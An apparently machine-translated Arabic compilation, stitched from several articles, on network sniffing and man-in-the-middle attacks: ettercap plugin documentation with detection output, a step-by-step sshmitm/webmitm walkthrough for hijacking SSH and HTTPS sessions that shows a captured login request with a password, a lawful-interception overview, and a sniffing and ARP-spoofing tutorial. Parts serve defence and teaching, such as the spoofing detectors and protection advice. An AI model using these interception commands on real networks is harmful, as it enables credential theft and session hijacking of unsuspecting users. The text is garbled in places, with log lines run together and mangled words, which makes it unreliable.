
يوسع

Mial@HackWare-Mint ~ $ sudo ettercap -TQP arp_cop // كلمة المرور لـ mial: ettercap 0.8.2 حقوق الطبع والنشر 2001-2015 لفريق تطوير Ettercap الاستماع على: eth0 -> 08:00:27:A3:08:4A 192.168.1.36/ 20530 mac بصمة البائع 1766 tcp OS بصمة 2182 الخدمات المعروفة التوزيع العشوائي لـ 255 مضيفًا للمسح... فحص قناع الشبكة بالكامل لـ 255 مضيفًا... * |=========== =====================>| 100.00 % تمت إضافة 3 مضيفين إلى قائمة المضيفين... بدء البحث الموحد... تم تنشيط الواجهة النصية فقط... اضغط على "h" للحصول على مساعدة مضمنة جارٍ تنشيط المكون الإضافي arp_cop... arp_cop: البرنامج الإضافي قيد التشغيل... arp_cop: (مضيف جديد ) 192.168.1.1 arp_cop: (تحذير) 192.168.1.35 يتظاهر بأنه 192.168.1.1 arp_cop: (تحذير) 192.168.1.35 يتظاهر بأنه 192.168.1.1 arp_cop: (تحذير) 192.168.1.35 يتظاهر بأنه 192.168.1.35 192.168.1.1 arp_cop: (تحذير ) 192.168.1.35 يتظاهر بأنه 192.168.1.1 arp_cop: (تحذير) 192.168.1.35 يتظاهر بأنه 192.168.1.1 arp_cop: (تحذير) 192.168.1.35 يتظاهر بأنه 192.168.1.1 arp_cop: (تحذير) 192.168.1.35 يتظاهر بأنه 192.168 .1.1 arp_cop: (تحذير) 192.168.1.35 يتظاهر بأنه 192.168.1.1 arp_cop: (تحذير) 192.168.1.35 يتظاهر بأنه 192.168.1.1 arp_cop: (تحذير) 192.168.1.35 يتظاهر بأنه 192.168 .1.1 arp_cop: (تحذير) 192.168 .1.35 يتظاهر بأنه 192.168.1.1 arp_cop: (تحذير) 192.168.1.35 يتظاهر بأنه 192.168.1.1 arp_cop: (تحذير) 192.168.1.35 يتظاهر بأنه 192.168.1.1 arp_cop: (تحذير) 192.168 .1.35 يتظاهر بأنه 192.168.1.1 arp_cop: (تحذير) 192.168.1.35 يتظاهر بأنه 192.168.1.1 arp_cop: (تحذير) 192.168.1.35 يتظاهر بأنه 192.168.1.1 arp_cop: (تحذير) 192.168.1.35 يتظاهر بأنه 192.168.1.1 arp_cop: (تحذير) 192.168.1.35 يتظاهر بأنه 192.168.1.1 arp_cop: (تحذير) 192.168.1.35 يتظاهر بأنه 192.168.1.1 arp_cop: (تحذير) 192.168.1.35 يتظاهر بأنه 192.168.1.1 arp_cop: (تحذير) 192.168.1.35 يتظاهر ليكون 192.168.1.1 arp_cop : (تحذير) 192.168.1.35 يتظاهر بأنه 192.168.1.1 arp_cop: (تحذير) 192.168.1.35 يتظاهر بأنه 192.168.1.1 arp_cop: (تحذير) 192.168.1.35 يتظاهر بأنه 192.168.1.1 arp_cop: (تحذير) 192.168.1.35 يتظاهر ليكون 192.168.1.1 arp_cop: (تحذير) 192.168.1.35 يتظاهر بأنه 192.168.1.1 arp_cop: (تحذير) 192.168.1.35 يتظاهر بأنه 192.168.1.1 arp_cop: (تحذير) 192.168.1.35 يتظاهر بأنه 192.168.1.35 يكون 192. 168.1.1 arp_cop: (تحذير) 192.168.1.35 يتظاهر بأنه 192.168.1.1 arp_cop: (تحذير) 192.168.1.35 يتظاهر بأنه 192.168.1.1 arp_cop: (تحذير) 192.168.1.35 يتظاهر بأنه 192. 168.1.1 أرب_كوب: ( تحذير) 192.168.1.35 يتظاهر بأنه 192.168.1.1 arp_cop: (تحذير) 192.168.1.35 يتظاهر بأنه 192.168.1.1 arp_cop: (تحذير) 192.168.1.35 يتظاهر بأنه 192.168.1.1 arp_cop: ( تحذير) 192.168.1.35 يتظاهر بأنه كذلك 192.168.1.1 arp_cop: (تحذير) 192.168.1.35 يتظاهر بأنه 192.168.1.1 arp_cop: (تحذير) 192.168.1.35 يتظاهر بأنه 192.168.1.1 arp_cop: (تحذير) 192.168.1.35 يتظاهر بأنه 192.168.1.35 192.168.1.1 arp_cop: (تحذير) 192.168.1.35 يتظاهر بأنه 192.168.1.1 arp_cop: (تحذير) 192.168.1.35 يتظاهر بأنه 192.168.1.1 arp_cop: (تحذير) 192.168.1.35 يتظاهر بأنه 192.168.1.1 arp_cop: (تحذير) 192.168.1.35 يتظاهر بأنه 192.168.1.35 1.1 ...........................

7.2 الإضافة التلقائية

سيتم إضافة ضحايا جدد تلقائيًا عند اتصالهم بهجوم تسمم ARP. فهو يبحث عن طلبات ARP على الشبكة المحلية، وإذا تم اكتشافها، فسيقوم البرنامج الإضافي بإضافة المضيف إلى قائمة الضحايا إذا تم تحديد القائمة على أنها TARGET. تتم إضافة المضيف عندما يكون طلب arp مرئيًا منه.

7.3 chk_poison

إنه يتحقق لمعرفة ما إذا كانت وحدات arp etch في ettercap ناجحة. فهو يرسل حزم صدى ICMP مزيفة إلى جميع ضحايا الاصطياد بينما يتظاهر بأنه كل ضحية. يمكنه التقاط استجابة ICMP باستخدام عنوان MAC الخاص بنا كوجهة، مما يعني أن الاصطياد بين الهدفين ناجح. فهو يتحقق من كلا المسارين لكل اتصال.

7.4 dns_spoof

يقاطع هذا المكون الإضافي طلبات DNS ويستجيب باستجابة مخادعة (زائفة). يمكنك اختيار العنوان الذي يجب أن يستجيب له المكون الإضافي عن طريق تحرير ملف etter.dns. يعترض البرنامج المساعد طلبات A وAAAA وPTR وMX وWINS وSRV وTXT. إذا كان طلبًا، فسيتم البحث عن الاسم في الملف ويتم إرجاع عنوان IP (يمكنك استخدام أحرف البدل في الاسم).

الأمر نفسه ينطبق على طلبات AAAA.

7.5 find_conn

مكون إضافي بسيط للغاية يستمع لطلبات ARP ليظهر لك جميع الأهداف التي يريد المضيف التواصل معها. يمكن أن يساعدك أيضًا في العثور على عناوين على شبكات LAN غير معروفة.

Ettercap -TQzP find_conn ettercap -TQu -i eth0 -P find_conn

7.6 find_ettercap

يحاول التعرف على حزم ettercap المرسلة إلى الشبكة المحلية. يمكن أن يكون مفيدًا في تحديد هوية الشخص الذي يحاول استخدام ettercap. لا تعتمد عليها بنسبة 100% لأن الاختبارات تعمل فقط على تسلسلات/أرقام معرفات محددة.

7.7 scan_poisoner

سيتم التحقق لمعرفة ما إذا كان هناك أي شخص يصطاد بيننا وبين أي من المضيفين المدرجين في القائمة. أولاً، يقوم بالتحقق مما إذا كان المضيفان في القائمة لهما نفس الشيء عنوان ماك. قد يعني هذا أن أحدهما يسممنا بالتظاهر بأنه الآخر. يمكن أن يولد الكثير من النتائج الإيجابية الخاطئة في بيئة الوكيل-ARP. يجب عليك إنشاء قائمة بالمضيفين لإجراء هذا الفحص. بعد ذلك، يرسل حزم صدى icmp إلى كل مضيف في القائمة ويتحقق مما إذا كان عنوان mac الخاص بمصدر الاستجابة مختلفًا عن العنوان الذي قمنا بتخزينه في القائمة باستخدام عنوان IP هذا. قد يعني هذا أن شخصًا ما يخدع هذا المضيف من خلال التظاهر بأنه لديه عنوان IP الخاص بنا وإعادة توجيه الحزم التي تم اعتراضها إلينا. لا يمكنك إجراء هذا الاختبار النشط في الوضع غير الهجومي.

Ettercap -TQP scan_poisoner //

7.8 search_promisc

يحاول معرفة ما إذا كان أي شخص يستنشق (يستمع) في الوضع المختلط. يرسل طلبين مختلفين من ARP سيئي التكوين إلى كل هدف في قائمة المضيفين وينتظر الردود. إذا جاءت الاستجابة من المضيف الهدف، فمن المرجح أن يكون لدى الهدف بطاقة الشبكة في الوضع المختلط. قد تولد إنذارات كاذبة. يمكنك تشغيله إما من سطر الأوامر أو من قائمة المكونات الإضافية. نظرًا لأنه يستمع إلى استجابات arp، فسيكون من الأفضل عدم استخدامها أثناء إرسال طلبات arp.

Ettercap -TQP search_promisc /192.168.0.1/ ettercap -TQP search_promisc //

مثال على التخمين الناجح لبطاقتي شبكة في الوضع غير المختلط:

يوسع

Root@HackWare:~# ettercap -TQP search_promisc ettercap 0.8.2 حقوق الطبع والنشر 2001-2015 لفريق تطوير Ettercap الاستماع على: eth0 -> 08:00:27:AF:30:B9 192.168.1.35/255.255.255.0 fe80::a00: 27ff:feaf:30b9/64 يحتاج تشريح SSL إلى برنامج نصي صالح "redir_command_on" في ملف etter.conf، وقد لا يعمل Ettercap بشكل صحيح. لم يتم تعيين /proc/sys/net/ipv6/conf/eth0/use_tempaddr على 0. تم إسقاط الامتيازات إلى EUID 65534 EGID 65534... 33 مكونًا إضافيًا 42 أداة تشريح البروتوكول 57 منفذًا مراقبًا 20388 بصمة بائع Mac 1766 بصمة tcp OS 2182 خدمات Lua المعروفة : لم يتم تحديد البرامج النصية، وليس البدء! توزيع عشوائي لـ 255 مضيفًا للمسح... فحص قناع الشبكة بالكامل لـ 255 مضيفًا... * |======================== ============================================================================= ======= 100.00% تمت إضافة 5 مضيفين إلى قائمة المضيفين... بدء البحث الموحد... تم تنشيط الواجهة النصية فقط... اضغط على "h" للحصول على مساعدة مضمنة. تنشيط البرنامج المساعد search_promisc... search_promisc: البحث عن بطاقات NIC promisc... أقل احتمالاً استنشاق بطاقات NIC : - 192.168.1.36 - 192.168.1.34 على الأرجح استنشاق بطاقات NIC: - لا شيء إغلاق واجهة النص... إنهاء ettercap... اكتملت عملية تنظيف Lua! تم إيقاف الاستنشاق الموحد.

7.9 سسلستريب

أثناء هجوم SSL mitm، تستبدل ettercap شهادة SSL الحقيقية بشهادتها الخاصة. يتم إنشاء الشهادة المزيفة بسرعة ويتم ملء جميع الحقول وفقًا للشهادة الحقيقية المقدمة من الخادم.

(62%)

(56.5%)

(عشوائي - 0.2%)

في هذه المقالة سنلقي نظرة على هجمات مثل Man-in-the-Middle، أو بالأحرى الطريقة
إعادة توجيه حركة مرور SSH وHTTP باستخدام هجوم Man in the Middle. دعونا لا نسحب القطة من ذيلها، ولكن دعونا نبدأ العمل.

رجل في المنتصف (باختصار MitM، من اللغة الروسية ببساطة - "هجوم الوسيط" أو "الرجل".
في المنتصف") هو نوع من الهجوم يعتمد على إعادة توجيه حركة المرور بين جهازين لاعتراض المعلومات - مزيد من الدراسة أو تدميرها أو تعديلها. لذا، أول شيء نحتاجه هو حزمة dsniff (سترى رابطًا للحزمة على نهاية المقالة). لماذا نعم، لأن هذه الحزمة تحتوي على جميع الأدوات المساعدة الضرورية، بما في ذلك sshmitm (إعادة توجيه حركة مرور SSH) وhttpmitm (إعادة توجيه حركة مرور HTTP)، والتي يمكنها تجاوز نظام الأمان التالي: بقدر ما تعلم، البروتوكولات ذات تشفير البيانات آمن تمامًا - فهو "آمن" (التشفير يساعد :)) ولا يسمح بتنفيذ الهجمات "فوق" طبقة الشبكة. مفتاح التشفير غير معروف للهاكر - من المستحيل فك تشفير البيانات وأدخل أمرًا أيضًا. يبدو كل شيء على ما يرام، ولكن إليك الطريقة
نظرًا لأن برامج الهجوم MitM (sshmitm وhttpmitm) من حزمة dsniff قادرة على تجاوز هذا النظامالأمان (يمكنك تجاوز كل شيء تقريبًا). ويتم كل ذلك وفق المبدأ التالي:
يتلقى المضيف الوسيط الطلب من العميل، ويخبره أنه الخادم، ثم يتصل بالخادم الحقيقي.
الشيء الثاني الذي نحتاجه هو أذرع مستقيمة، والشيء الرابع - والأهم - هو الرغبة، وبالطبع الضحية، أي الكمبيوتر الذي سنهاجمه.

إعادة توجيه حركة مرور SSH

بعد إعداد الأدوات، فهمت ماذا ولماذا :). احصل على sshmitm - الآن سنقوم بإعادة توجيه حركة مرور SSH (كل ما لم تفهمه في الجزء النظري - اقرأ أعلاه)
استخدامه، مع الاستفادة من أوجه القصور في البنية التحتية للمفاتيح العامة (PKI) الحالية - نظام إدارة المفاتيح القائم على
طرق التشفير غير المتماثل). دعونا نلقي نظرة على بناء الجملة
شميتم:

مضيف sshmitm [-d] [-I] [-p port].

د
السماح بإخراج التصحيح (أي الوضع الأكثر تقدمًا)

أنا
اختطاف الجلسة

منفذ P
منفذ الاستماع

يستضيف
عنوان المضيف البعيد الذي سيتم اعتراض جلساته

ميناء
المنفذ على المضيف البعيد

كل شيء يبدو بسيطًا ولذيذًا - لا يوجد شيء معقد :). لنبدأ بتنفيذ الهجوم!

# sshmitm server.target.gov // حدد خادم SSH الخاص بك
sshmitm: الترحيل إلى الخادم server.target.gov

نظرًا لعدم وجود مفتاح SSH حقيقي لدينا، فقد تعرض مترجم الأوامر للهجوم
سيعرض طلبًا للتحقق من مفتاح المضيف، وسيبدو الأمر كما يلي:

Clientmachine$ server.target.gov
@تحذير: هويه المضيف البعيد قد تغيرت! @
من الممكن أن يقوم شخص ما بشيء سيئ!
من الممكن أن يتنصت شخص ما عليك الآن (هجوم الرجل في المنتصف)!
من الممكن أيضًا أن يكون مفتاح مضيف RSA قد تم تغييره للتو.
من فضلك تواصل مع مسؤول نظامك.

وبعد ذلك سيقرر المستخدم ما إذا كان يريد الاتصال أم لا. إذا كانت الإجابة بنعم، فسيكون لدينا السيطرة الكاملة على جلسة SSH.
لكن! إذا لم يتصل المستخدم بهذه السيارة مطلقًا، فقد يتم عرض الرسالة التالية:

لا يمكن التأكد من صحة المضيف "server.target.gov".
بصمة مفتاح RSA هي
بلا بلا بلا بلا بلا........
هل أنت متأكد من رغبتك في مواصلة الاتصال (نعم/لا)؟

هنا يكون لدى المستخدم أيضًا خياران - الاتصال أم لا. إذا كانت الإجابة بنعم، فقد اعترضنا الجلسة، وإذا لم يكن الأمر كذلك، فللأسف... :(.
بشكل عام، كان الهجوم ناجحًا إذا كان المستخدم متصلاً، وقام sshmitm بدوره بتسجيل جميع عمليات المرور وتسجيلات الدخول، وبطريقة سهلة القراءة :)
بطبيعة الحال، هذا ليس معترض جلسة SSH الوحيد، ولكن بمجرد أن تتعرف عليه، يمكنك بسهولة إتقان واحد آخر :)

إعادة توجيه حركة مرور HTTP

الآن سنقوم بإعادة توجيه حركة مرور HTTP. مرة أخرى، سنحتاج إلى أداة محددة مسبقًا: httpmitm، التي تستمع إلى المنافذ 80 (HTTP -) و443 (HTTPS -)، وتعترض طلبات الويب، ثم تتصل بالخادم وتعيد توجيه الطلبات إلى الكمبيوتر العميل. يقوم البرنامج أيضًا بإنشاء مفاتيح SSL وشهادات SSL باستخدام OpenSSL. ثم بعد المحاولة
يتصل بموقع (target.gov)، فسيقوم المتصفح بالتحقق من شهادة SSL. وبما أن الشهادات لن تتطابق، فسوف يحذر متصفح المستخدم منها
شهادة SSL غير صحيحة. من وجهة نظر المهاجم سيبدو الأمر كما يلي:

#webmitm -د
webmitm: الترحيل بشفافية
webmitm: اتصال جديد من
احصل على [الرابط]/uzerz.php?user=hellknights&password=neskaju1qwerty HTTP/[الإصدار]
الاتصال: [نوع]
المضيف: www.target.gov
وكيل المستخدم: [النظام، معلومات المتصفح]
[الخ الخ الخ]
ملف تعريف الارتباط: [ملفات تعريف الارتباط]

هكذا يبدو كل شيء من الخارج -
يتم اعتراض اتصال SSL، مما يؤدي إلى التقاط البيانات غير المشفرة.

خاتمة

في هذه المقالة، نظرنا في إعادة توجيه حركة مرور SSH وHTTP باستخدام هجوم Man in the Middle - بوضوح وبالتفصيل وباختصار. أدوات إعادة توجيه HTTP وSSH الأخرى
سوف تتقن حركة المرور باستخدام MitM بسرعة إذا كنت قد أتقنت ذلك أيضًا :)). إذا كان هناك شيء غير واضح، ثم...

اعتراض البيانات عبر الشبكة هو استلام أي معلومات من جهاز كمبيوتر بعيد. وقد تتكون من المعلومات الشخصية للمستخدم ورسائله وسجلات زيارات الموقع. يمكن أن يتم التقاط البيانات عن طريق برامج التجسس أو باستخدام متطفلي الشبكة.

برامج التجسس هي برامج خاصة يمكنها تسجيل جميع المعلومات المنقولة عبر الشبكة من محطة عمل أو جهاز محدد.

المتشمم هو برنامج أو تقنية كمبيوتر تعترض وتحلل حركة المرور التي تمر عبر الشبكة. يتيح لك برنامج الشم الاتصال بجلسة ويب وإجراء عمليات مختلفة نيابة عن مالك الكمبيوتر.

إذا لم يتم نقل المعلومات في الوقت الحقيقي، برامج التجسسإنشاء تقارير تجعل من السهل عرض المعلومات وتحليلها.

يمكن تنفيذ اعتراض الشبكة بشكل قانوني أو غير قانوني. الوثيقة الرئيسية التي تحدد مشروعية الحصول على المعلومات هي اتفاقية الجرائم الإلكترونية. تم إنشاؤه في المجر عام 2001. قد تختلف المتطلبات القانونية قليلاً من دولة إلى أخرى، ولكن الرسالة الرئيسية هي نفسها بالنسبة لجميع البلدان.

تصنيف وطرق اعتراض البيانات عبر الشبكة

وفقًا لما سبق، يمكن تقسيم اعتراض المعلومات عبر الشبكة إلى نوعين: مسموح به وغير مصرح به.

يتم التقاط البيانات المصرح بها لأغراض مختلفة، تتراوح من حماية معلومات الشركة إلى ضمان الأمن القومي. يتم تحديد أسباب تنفيذ مثل هذه العملية من خلال التشريعات والخدمات الخاصة والمسؤولين عن إنفاذ القانون والمتخصصين المنظمات الإداريةوخدمات أمن الشركة.

هناك معايير دولية لأداء اعتراض البيانات. تمكن المعهد الأوروبي لمعايير الاتصالات من تنسيق عدد من العمليات التقنية (ETSI ES 201 158 "أمن الاتصالات؛ الاعتراض القانوني (LI)؛ متطلبات وظائف الشبكة") التي يعتمد عليها اعتراض المعلومات. ونتيجة لذلك، تم تطوير بنية النظام التي تساعد متخصصي الخدمة السرية ومسؤولي الشبكات في الحصول بشكل قانوني على البيانات من الشبكة. يتم استخدام البنية المطورة لتنفيذ اعتراض البيانات عبر الشبكة للاتصالات السلكية والسلكية الأنظمة اللاسلكيةالمكالمات الصوتية، وكذلك المراسلات عن طريق البريد، ونقل الرسائل الصوتية عبر IP، وتبادل المعلومات عبر الرسائل القصيرة.

يتم تنفيذ الاعتراض غير المصرح به للبيانات عبر الشبكة من قبل مهاجمين يرغبون في الاستيلاء على البيانات السرية وكلمات المرور وأسرار الشركة وعناوين أجهزة الكمبيوتر الموجودة على الشبكة وما إلى ذلك. لتحقيق أهدافهم، عادة ما يستخدم المتسللون محلل حركة مرور الشبكة - الشم. هذا البرنامجأو جهاز برمجي يمنح المحتال القدرة على اعتراض وتحليل المعلومات داخل الشبكة التي يتصل بها المستخدم الضحية، بما في ذلك حركة مرور SSL المشفرة من خلال انتحال الشهادة. يمكن الحصول على بيانات حركة المرور بطرق مختلفة:

الاستماع إلى واجهة الشبكة،
توصيل جهاز اعتراض بفاصل قناة،
إنشاء فرع حركة المرور وتكراره إلى المتشمم،
من خلال تنفيذ الهجوم.

هناك أيضًا تقنيات أكثر تعقيدًا لاعتراض المعلومات المهمة التي تسمح بالتطفل على تفاعلات الشبكة وتغيير البيانات. إحدى هذه التقنيات هي طلبات ARP المخادعة. جوهر هذه الطريقة هو استبدال عناوين IP بين كمبيوتر الضحية وجهاز المهاجم. هناك طريقة أخرى يمكن استخدامها لاعتراض البيانات عبر الشبكة وهي التوجيه الخاطئ. يتضمن استبدال عنوان IP الخاص بجهاز توجيه الشبكة بعنوانك الخاص. إذا كان مجرم الإنترنت يعرف كيفية تنظيم الشبكة المحلية التي توجد بها الضحية، فيمكنه بسهولة تنظيم استلام المعلومات من جهاز المستخدم إلى عنوان IP الخاص به. يعمل أيضًا التقاط اتصال TCP بطريقة فعالةاعتراض البيانات. يقوم المهاجم بمقاطعة جلسة الاتصال عن طريق إنشاء وإرسال حزم TCP إلى كمبيوتر الضحية. بعد ذلك، تتم استعادة جلسة الاتصال واعتراضها ومواصلتها بواسطة المجرم بدلاً من العميل.

كائن التأثير

يمكن أن تكون أهداف اعتراض البيانات عبر الشبكة هي الوكالات الحكومية والمؤسسات الصناعية والهياكل التجارية والمستخدمين العاديين. داخل مؤسسة أو شركة تجارية، يمكن التقاط المعلومات من أجل حماية البنية التحتية للشبكة. يمكن لوكالات الاستخبارات ووكالات إنفاذ القانون إجراء اعتراض جماعي للمعلومات المرسلة من مالكين مختلفين، اعتمادًا على المهمة المطروحة.

إذا تحدثنا عن مجرمي الإنترنت، فيمكن أن يصبح أي مستخدم أو مؤسسة كائنًا للتأثير من أجل الحصول على البيانات المنقولة عبر الشبكة. مع الوصول المصرح به، يكون الجزء الإعلامي من المعلومات المستلمة مهمًا، بينما يهتم المهاجم أكثر بالبيانات التي يمكن استخدامها للاستيلاء على نقداأو معلومات قيمة لبيعها لاحقا.

في أغلب الأحيان، يصبح المستخدمون الذين يتصلون بشبكة عامة، على سبيل المثال في مقهى به نقطة اتصال، ضحايا لاعتراض المعلومات من قبل مجرمي الإنترنت. الوصول إلى خدمة الواي فاي. يتصل المهاجم بجلسة ويب باستخدام أداة الشم، ويستبدل البيانات ويسرق المعلومات الشخصية. اقرأ المزيد حول كيفية حدوث ذلك في المقالة.

مصدر التهديد

يتم تنفيذ الاعتراض المصرح به للمعلومات في الشركات والمؤسسات من قبل مشغلي البنية التحتية للشبكات العامة. تهدف أنشطتهم إلى حماية البيانات الشخصية والأسرار التجارية وغيرها معلومات مهمة. ومن الناحية القانونية، يمكن مراقبة نقل الرسائل والملفات من قبل أجهزة المخابرات ووكالات إنفاذ القانون والجهات الحكومية المختلفة لضمان سلامة المواطنين والدولة.

ويشارك المجرمون في اعتراض البيانات بشكل غير قانوني. لتجنب الوقوع ضحية لمجرم إلكتروني، يتعين عليك اتباع بعض توصيات الخبراء. على سبيل المثال، لا ينبغي عليك إجراء عمليات تتطلب ترخيصًا ونقل البيانات الحساسة في الأماكن التي يكون فيها الاتصال بالشبكات العامة. يعد اختيار الشبكات ذات التشفير أكثر أمانًا، بل والأفضل من ذلك - استخدام أجهزة مودم 3G وLTE الشخصية. عند نقل البيانات الشخصية، يوصى بتشفيرها باستخدام بروتوكول HTTPS أو نفق VPN شخصي.

يمكنك حماية جهاز الكمبيوتر الخاص بك من اعتراض حركة مرور الشبكة باستخدام التشفير ومكافحة المتشممين؛ سيؤدي الاتصال الهاتفي بدلاً من الوصول إلى الشبكة اللاسلكية إلى تقليل المخاطر.

يصف هذا الدرس تقنيات اختراق الشبكات بناءً على اعتراض حزم الشبكة. يستخدم المتسللون مثل هذه التقنيات للاستماع إلى حركة مرور الشبكة من أجل سرقة معلومات قيمة، وتنظيم اعتراض البيانات لغرض هجوم الوسيط، ولاعتراض اتصالات TCP، مما يسمح، على سبيل المثال، بانتحال البيانات، وتنفيذ عمليات أخرى. إجراءات مثيرة للاهتمام على قدم المساواة. ولسوء الحظ، يتم تنفيذ معظم هذه الهجمات فعليًا على شبكات Unix فقط، حيث يمكن للمتسللين استخدام كليهما المرافق الخاصةوأدوات نظام يونكس. يبدو أن شبكات Windows قد تم تجاهلها من قبل المتسللين، ونحن مضطرون إلى قصر وصفنا لأدوات اعتراض البيانات على برامج التجسس المصممة للاستماع التافه لحزم الشبكة. ومع ذلك، لا ينبغي إهمال الوصف النظري على الأقل لمثل هذه الهجمات، خاصة بالنسبة لمكافحة المتسللين، لأن معرفة تقنيات القرصنة المستخدمة ستساعد في منع العديد من المشاكل.

استنشاق الشبكة

يُستخدم عادةً لاستنشاق شبكات Ethernet. بطاقات الشبكةتحولت إلى وضع الاستماع. الاستماع شبكات إيثرنتيتطلب توصيل جهاز كمبيوتر يقوم بتشغيل برنامج sniffer بمقطع شبكة، وبعد ذلك تصبح جميع حركة مرور الشبكة المرسلة والمستقبلة بواسطة أجهزة الكمبيوتر في مقطع الشبكة هذا متاحة للمتسلل. من الأسهل اعتراض حركة المرور من شبكات الراديو التي تستخدم وسطاء الشبكات اللاسلكية - في هذه الحالة، لا تحتاج حتى إلى البحث عن مكان للاتصال بالكابل. أو يمكن للمهاجم الاتصال بخط الهاتف الذي يربط الكمبيوتر بخادم الإنترنت، وإيجاد مكان مناسب لذلك (عادةً ما يتم وضع خطوط الهاتف في الطوابق السفلية وغيرها من الأماكن التي نادراً ما تتم زيارتها دون أي حماية).

لتوضيح تقنية الشم، سوف نستخدم برنامج الشم SpyNet المشهور جدًا، والذي يمكن العثور عليه في العديد من مواقع الويب. الموقع الرسمي لبرنامج SpyNet موجود على http://members.xoom.com/layrentiu2/ حيث يمكنك تحميل النسخة التجريبية من البرنامج.

يتكون برنامج SpyNet من مكونين - CaptureNet وPipeNet. يتيح لك برنامج CaptureNet اعتراض الحزم المرسلة عبر شبكة إيثرنت على مستوى الشبكة، أي. في شكل إطارات إيثرنت. يسمح لك برنامج PipeNet بتجميع إطارات Ethernet في حزم طبقة التطبيق، واستعادة الرسائل على سبيل المثال بريد إلكترونيورسائل بروتوكول HTTP (تبادل المعلومات مع خادم الويب) وتنفيذ وظائف أخرى.

لسوء الحظ، في العرض التوضيحي لـ SpyNet، تقتصر إمكانيات PipeNet على العرض التوضيحي لتجميع حزم HTTP، لذلك لن نتمكن من عرض SpyNet بالكامل. ومع ذلك، سنعرض قدرات SpyNet على اكتشاف الشبكة باستخدام شبكتنا التجريبية كمثال بشكل عابر ملف نصيمن مضيف Sword-2000 إلى مضيف Alex-Z باستخدام المعتاد مستكشف ويندوز. في الوقت نفسه، على جهاز الكمبيوتر A1ex-1، سنطلق برنامج CaptureNet، الذي سيعترض الحزم المرسلة ويسمح لنا بقراءة محتويات الملف المرسل في إطارات Ethernet. في التين. 1 يعرض نص الرسالة السرية في الملف Secret.txt؛ سنحاول العثور على هذا النص في إطارات Ethernet الملتقطة.

أرز. 1. نص الرسالة السرية في نافذة المفكرة

لالتقاط إطارات Ethernet، اتبع الخطوات التالية:

على كمبيوتر Alex-Z، قم بتشغيل برنامج CaptureNet. في نافذة العمل المعروضة للبرنامج، حدد أمر القائمة Capture * Start (Capture * Start) وابدأ عملية اعتراض إطارات الشبكة.

باستخدام Windows Explorer، انسخ ملف Security.txt من كمبيوتر Sword-2000 إلى A1ex-3.

بعد نقل ملف Secret.txt، حدد أمر القائمة Capture * Stop وأوقف عملية الالتقاط.

ستظهر إطارات Ethernet الملتقطة على الجانب الأيمن من نافذة برنامج CaptureNet (الشكل 2)، حيث يمثل كل صف في القائمة العلوية إطار Ethernet، وأسفل القائمة محتويات الإطار المحدد.

أرز. 2. يحتوي إطار Ethernet على نص رسالة سرية

بعد النظر في قائمة الإطارات التي تم اعتراضها، يمكننا بسهولة العثور على الإطار الذي يحتوي على النص الذي أرسلناه. وهذا سر كبير جدًا (هذا سر كبير جدًا).

نؤكد أن هذا هو أبسط مثال، عندما تم تسجيل كل حركة مرور الشبكة التي تم اعتراضها. يسمح لك CaptureNet باعتراض الحزم المرسلة عبر بروتوكولات محددة وإلى منافذ مضيفة محددة، واختيار الرسائل ذات المحتوى المحدد، وتجميع البيانات الملتقطة في ملف. تقنية تنفيذ مثل هذه الإجراءات بسيطة، ويمكن تعلمها باستخدام نظام المساعدة الخاص ببرنامج SpyNet.

بالإضافة إلى التنصت البدائي على الشبكة، يتمتع المتسللون بإمكانية الوصول إلى وسائل أكثر تطورًا لاعتراض البيانات. وفيما يلي لمحة موجزة عن هذه الأساليب، وإن كان من الجانب النظري. والسبب هو أنه بالنسبة لشبكات Windows، فإن التنفيذ العملي لهجمات اعتراض البيانات محدود للغاية، كما أن مجموعة الأدوات المساعدة الموثوقة لهجمات الاعتراض سيئة للغاية.

طرق اعتراض حركة مرور الشبكة

يعد التعرف على الشبكة باستخدام برامج محلل الشبكة مثل CaptureNet أعلاه أول وأبسط طريقة لاعتراض البيانات. بالإضافة إلى SpyNet، يتم استخدام العديد من الأدوات لرصد الشبكة، والتي تم تطويرها في البداية لأغراض تحليل نشاط الشبكة وتشخيص الشبكات واختيار حركة المرور وفقًا لمعايير محددة ومهام إدارة الشبكة الأخرى. مثال على هذا البرنامج هو tcpdump (http://www.tcpdump.org)، والذي يسمح لك بتسجيل حركة مرور الشبكة في سجل خاص للتحليل اللاحق.

للحماية من التنصت على الشبكة، يتم استخدام برامج خاصة، على سبيل المثال، AntiSniff (http://www.securitysoftwaretech.com/antisniff)، القادرة على تحديد أجهزة الكمبيوتر الموجودة على الشبكة التي تستمع إلى حركة مرور الشبكة. لحل مشاكلها، تستخدم برامج مكافحة الشم علامة خاصة على وجود أجهزة استماع على الشبكة - يجب أن تكون بطاقة الشبكة الخاصة بجهاز الكمبيوتر المتشمم في وضع استماع خاص. أثناء وجودها في وضع الاستماع، تتفاعل أجهزة كمبيوتر الشبكة بطريقة خاصة مع مخططات بيانات IP المرسلة إلى المضيف الذي يتم اختباره. على سبيل المثال، يقوم المضيفون المستمعون عادةً بمعالجة كل حركة المرور الواردة، وليس فقط مخططات البيانات المرسلة إلى عنوان المضيف. هناك علامات أخرى تشير إلى سلوك مضيف مريب يمكن لـ AntiSniff التعرف عليه.

طلبات ARP الكاذبة

لاعتراض عملية تفاعل الشبكة بين المضيفين A وB والسيطرة عليها، يمكن للمهاجم استبدال عناوين IP الخاصة بالمضيفين المتفاعلين بعنوان IP الخاص به عن طريق إرسال رسائل ARP (بروتوكول تحليل العنوان) المزيفة إلى المضيفين A وB. يمكنك التعرف على بروتوكول ARP في الملحق د، الذي يصف الإجراء الخاص بتحليل (تحويل) عنوان IP الخاص بالمضيف إلى عنوان الجهاز (عنوان MAC) المضمن في بطاقة شبكة المضيف. دعونا نرى كيف يمكن للمتسلل استخدام ARP لاعتراض اتصالات الشبكة بين المضيفين A وB.

يحدد المهاجم عناوين MAC للمضيفين A وB، على سبيل المثال، باستخدام الأمر nbtstat من حزمة W2RK.

يرسل المهاجم رسائل إلى عناوين MAC المحددة للمضيفين A وB، وهي عبارة عن استجابات ARP مزيفة لطلبات تحليل عناوين IP الخاصة بالمضيفين إلى عناوين MAC لأجهزة الكمبيوتر. يتم إبلاغ المضيف "أ" بأن عنوان IP الخاص بالمضيف "ب" يتوافق مع عنوان MAC الخاص بجهاز الكمبيوتر الخاص بالمهاجم؛ يتم إبلاغ المضيف B بأن عنوان IP الخاص بالمضيف A يتوافق أيضًا مع عنوان MAC الخاص بجهاز الكمبيوتر الخاص بالمهاجم.

